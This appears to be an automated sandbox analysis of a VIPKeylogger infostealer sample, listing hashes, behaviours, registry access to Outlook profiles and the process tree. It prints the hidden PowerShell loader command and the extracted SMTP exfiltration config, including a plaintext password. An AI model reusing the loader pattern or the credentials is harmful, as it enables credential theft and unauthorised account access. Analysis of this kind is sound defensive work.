Analysis
-
max time kernel
141s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23-10-2024 01:07
Static task
static1
Behavioral task
behavioral1
Sample
1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Levitator/Exungulate.ps1
Resource
win7-20240708-en
Behavioral task
behavioral4
Sample
Levitator/Exungulate.ps1
Resource
win10v2004-20241007-en
General
-
Target
1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904.exe
-
Size
870KB
-
MD5
a1e239c4d5116e289ce0597a92844ede
-
SHA1
4562d452ccc32512291c3165a0b9b3c076b28094
-
SHA256
1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904
-
SHA512
500ddcdc2f1e3ca0da0a43006b99c6e78697433fc0757d25ddff94190dd2d725799faf267efdfacdef758e9024591368454f14025662cc6a1309bce7863494d2
-
SSDEEP
24576:/75JHVcDo1hTW+VeQ9Ke+alCJmvulW6Nd0vd:jDHVUW/VrKe+m7mwMAd
Malware Config
Extracted
Protocol: smtp- Host:
smtp.ionos.es - Port:
587 - Username:
[email protected] - Password:
pW@4G()=#2
Extracted
vipkeylogger
Protocol: smtp- Host:
smtp.ionos.es - Port:
587 - Username:
[email protected] - Password:
pW@4G()=#2 - Email To:
[email protected]
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepid process 2720 powershell.exe 740 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 14 IoCs
Processes:
msiexec.exemsiexec.exeflow pid process 22 3468 msiexec.exe 23 4232 msiexec.exe 25 3468 msiexec.exe 26 4232 msiexec.exe 29 3468 msiexec.exe 30 4232 msiexec.exe 32 3468 msiexec.exe 33 4232 msiexec.exe 35 4232 msiexec.exe 36 3468 msiexec.exe 56 4232 msiexec.exe 62 4232 msiexec.exe 67 4232 msiexec.exe 73 4232 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 55 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
msiexec.exemsiexec.exepid process 4232 msiexec.exe 3468 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
powershell.exepowershell.exemsiexec.exemsiexec.exepid process 740 powershell.exe 2720 powershell.exe 3468 msiexec.exe 4232 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4948 3468 WerFault.exe msiexec.exe -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904.exepowershell.exepowershell.exemsiexec.exemsiexec.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
powershell.exepowershell.exemsiexec.exepid process 740 powershell.exe 740 powershell.exe 2720 powershell.exe 2720 powershell.exe 740 powershell.exe 740 powershell.exe 740 powershell.exe 740 powershell.exe 740 powershell.exe 740 powershell.exe 2720 powershell.exe 2720 powershell.exe 2720 powershell.exe 2720 powershell.exe 740 powershell.exe 2720 powershell.exe 4232 msiexec.exe 4232 msiexec.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
powershell.exepowershell.exepid process 2720 powershell.exe 740 powershell.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
Processes:
powershell.exepowershell.exemsiexec.exedescription pid process Token: SeDebugPrivilege 740 powershell.exe Token: SeDebugPrivilege 2720 powershell.exe Token: SeIncreaseQuotaPrivilege 740 powershell.exe Token: SeSecurityPrivilege 740 powershell.exe Token: SeTakeOwnershipPrivilege 740 powershell.exe Token: SeLoadDriverPrivilege 740 powershell.exe Token: SeSystemProfilePrivilege 740 powershell.exe Token: SeSystemtimePrivilege 740 powershell.exe Token: SeProfSingleProcessPrivilege 740 powershell.exe Token: SeIncBasePriorityPrivilege 740 powershell.exe Token: SeCreatePagefilePrivilege 740 powershell.exe Token: SeBackupPrivilege 740 powershell.exe Token: SeRestorePrivilege 740 powershell.exe Token: SeShutdownPrivilege 740 powershell.exe Token: SeDebugPrivilege 740 powershell.exe Token: SeSystemEnvironmentPrivilege 740 powershell.exe Token: SeRemoteShutdownPrivilege 740 powershell.exe Token: SeUndockPrivilege 740 powershell.exe Token: SeManageVolumePrivilege 740 powershell.exe Token: 33 740 powershell.exe Token: 34 740 powershell.exe Token: 35 740 powershell.exe Token: 36 740 powershell.exe Token: SeIncreaseQuotaPrivilege 2720 powershell.exe Token: SeSecurityPrivilege 2720 powershell.exe Token: SeTakeOwnershipPrivilege 2720 powershell.exe Token: SeLoadDriverPrivilege 2720 powershell.exe Token: SeSystemProfilePrivilege 2720 powershell.exe Token: SeSystemtimePrivilege 2720 powershell.exe Token: SeProfSingleProcessPrivilege 2720 powershell.exe Token: SeIncBasePriorityPrivilege 2720 powershell.exe Token: SeCreatePagefilePrivilege 2720 powershell.exe Token: SeBackupPrivilege 2720 powershell.exe Token: SeRestorePrivilege 2720 powershell.exe Token: SeShutdownPrivilege 2720 powershell.exe Token: SeDebugPrivilege 2720 powershell.exe Token: SeSystemEnvironmentPrivilege 2720 powershell.exe Token: SeRemoteShutdownPrivilege 2720 powershell.exe Token: SeUndockPrivilege 2720 powershell.exe Token: SeManageVolumePrivilege 2720 powershell.exe Token: 33 2720 powershell.exe Token: 34 2720 powershell.exe Token: 35 2720 powershell.exe Token: 36 2720 powershell.exe Token: SeDebugPrivilege 4232 msiexec.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904.exepowershell.exepowershell.exedescription pid process target process PID 3384 wrote to memory of 740 3384 1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904.exe powershell.exe PID 3384 wrote to memory of 740 3384 1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904.exe powershell.exe PID 3384 wrote to memory of 740 3384 1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904.exe powershell.exe PID 3384 wrote to memory of 2720 3384 1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904.exe powershell.exe PID 3384 wrote to memory of 2720 3384 1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904.exe powershell.exe PID 3384 wrote to memory of 2720 3384 1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904.exe powershell.exe PID 740 wrote to memory of 3468 740 powershell.exe msiexec.exe PID 740 wrote to memory of 3468 740 powershell.exe msiexec.exe PID 740 wrote to memory of 3468 740 powershell.exe msiexec.exe PID 2720 wrote to memory of 4232 2720 powershell.exe msiexec.exe PID 2720 wrote to memory of 4232 2720 powershell.exe msiexec.exe PID 2720 wrote to memory of 4232 2720 powershell.exe msiexec.exe PID 2720 wrote to memory of 4232 2720 powershell.exe msiexec.exe PID 740 wrote to memory of 3468 740 powershell.exe msiexec.exe -
outlook_office_path 1 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
Processes:
msiexec.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904.exe"C:\Users\Admin\AppData\Local\Temp\1e507febdd48a2bf2429c8011bd5cbc5c7b018207bdaec87665b8b51fa13d904.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3384 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3468 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3468 -s 20204⤵
- Program crash
PID:4948 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Ungarnsopholdet197=Get-Content -raw 'C:\Users\Admin\AppData\Roaming\underarmsmusklens\Edriophthalmian\Levitator\Exungulate.Spe205';$Ratanhia=$Ungarnsopholdet197.SubString(55438,3);.$Ratanhia($Ungarnsopholdet197)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:4232
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3468 -ip 34681⤵PID:3384
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
854B
MD5e935bc5762068caf3e24a2683b1b8a88
SHA182b70eb774c0756837fe8d7acbfeec05ecbf5463
SHA256a8accfcfeb51bd73df23b91f4d89ff1a9eb7438ef5b12e8afda1a6ff1769e89d
SHA512bed4f6f5357b37662623f1f8afed1a3ebf3810630b2206a0292052a2e754af9dcfe34ee15c289e3d797a8f33330e47c14cbefbc702f74028557ace29bf855f9e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize1KB
MD576b2de4276a82861ed2fc9622aca4532
SHA1121d53d4ccd29ff917c424c703a718f4ce811172
SHA256a5d281814ab7745a410c2de4e66244f253662f3c78fdc0d2a280632afab807e4
SHA512de2758ac45fd6d48008c9ad0f58e71d064e6284f8665cd09794f9d1a6d6c2747ed7c9be6f6a784c530b72290c0de015849e9a650e2ddd7172dda1dba79562605
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize471B
MD5ed2bc277627fe9729bb6e14fc0ca8651
SHA145904821d33b90391b60e1c78283343b40167f79
SHA2567d3aa148aa339df14b24d65c7ec460b0bec9067dee838ef9a48a1028e393a99b
SHA512e02dd1357820ef6824580e5d9277ffcaa8540f936ae076de3dca4a61c2ab4ad0b4d1b024a171473bbd65bd8a9cf27f46167f3f38be04d56280b7348abe23440a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize472B
MD5452e11716ea4843afe2f66561e31bed5
SHA136e2c61b5ead22352683945567e75f3bfbfc6b3c
SHA2569daa8523616103e9dd1f7ba52b95b16fcf1b6935d43488db6abf5467dceab917
SHA512b9089c671248e5a4b47742756da9837ae49da54a9cd3072624266adaaf69bcc32dabde6fcd1b7529ec6fefa3b127ec745ce425f3de22bc3cff1b922be8075d89
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199
Filesize170B
MD53e0c752ea08c9dfa0238fd5ce0810527
SHA1c4a4861d6385c7db753df01933a97d61fce27f6b
SHA25690010ac301d8a1a74d00a9aadfe6c50af040ab01a30d30f4f2d0b3815d5a7f24
SHA512392b7db648bcc567c94eeae1c301a7ba66f97670a5700eda819f7c55fb2ebc638bdcbc312b5f6a67ea91a139491e28191a6568c21cbe32aeaf14fc9c2dc68f71
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD5e6f1c754c28d8e86083b34471b96b522
SHA1b02fc76ca76668920149e2a8ac333f3bece52fda
SHA256d412dd113ffc11850d95590a05256a5781c50c5605e29df10344b674bcd0c438
SHA5124d68d65106092a83c34f6637ca5fc8b2c21db07971abf4461f1ddff7829ca2228bd6b0550bed323b3615d267e58b69d066db8f3aff595f42273e09add47aec1b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
Filesize410B
MD59926924cde42b97d6af3da647d0ca59b
SHA1629b241dd65ddc03d216a364fe852529c5d5c3b3
SHA256bf07ce07e0394bf8cc90e75362e07fb032f922f42e21f3d4664b494a1fba2198
SHA512065d4cb68921b3cf98706290ccae774fa565998267bae07b672ed18da968e634c6980293df23397cdd9649e819375e2feebd4c69deb6a04e1488a2acd4da8e85
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_B60DAD4239F8DBB7FDA230724F9F9DFD
Filesize406B
MD5972a6d7fa4451e526b711a28b26bb1ba
SHA1336882aefa8de66c09b36e2fb0de4e41a4bd0cec
SHA256aeea949a6e0ebd17b28c045941b43ca98f6d8583e26e7b451a1126fdcbed513a
SHA5122be7b135719a38fbfff20511a6eecb2becc643834108d034fb06d69b1f602680c5dd95f3ca9b7ca931268f713a073ec008de47f676578eb48a200040a30bf37c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDE8B1B7E253A9758EC380BD648952AF_3459237E893F04A4596206DC25825D64
Filesize402B
MD538694f6662c244ce8d12de135e3bb5d6
SHA146e1d889dea36fe475efbc94d556b538f29f06c3
SHA256564612dea7253df1ed1bd024a18d37e895711d890e6b666bb964548d13236bca
SHA5128561224c724f3ca156f3a083dcbb27096590a17e25c8e8cbb457f6f7e799dc5d652de7d425dae1cec2d4436ab76d8b15326902efc0bcaf65b0eedeee56f74189
-
Filesize
53KB
MD501404e51f6442f60e478c306b1e6e52e
SHA137f234ccf5611b8309023410ceb9e76ad81f5678
SHA256d4356dd23aa2e811712132f9718786331661a1bd0d062c49cb76807b9563928b
SHA51294a9d843ae4055e2a9b412f03cba85e2d7b804ec3106f059d14ca50b15ae4acc6cd452f9461c2e21d1632d06848c969732c539aea17869b8b3a2f5ab93b891d7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
54KB
MD50d2ce39822e9236a380f4d1d53550e93
SHA18381b0e62708112dbfbed036650bf0667ec4476b
SHA256ed34db2a55a35c90b524d2448353eb73d28da7d7ff401477165c226ff25de9af
SHA512f365bb861db3fc6d29736b3f8c0377bb4f8318fff94bc96033ae208760082b529b8aea4cf79de9efa3608c79ac91fe57e19f26959831f621bba8816e1013afc3
-
Filesize
332KB
MD5d3086578d45d821207eac6cbb8e24a2b
SHA10772cbce5403edae1aab6310b2f58d7f99c726c0
SHA256e856fc4f6b157e7799c1af872064cd1be9f982b1a5d18d7b16e5c3a48e3a1b1a
SHA5127db853becc19b209c0534c8f09635c55dab9bc540bd138054c2e84bbfc396bfa587bd4549a7188824f95271c04894bb7c66795f75267bca16620bc27ed38807d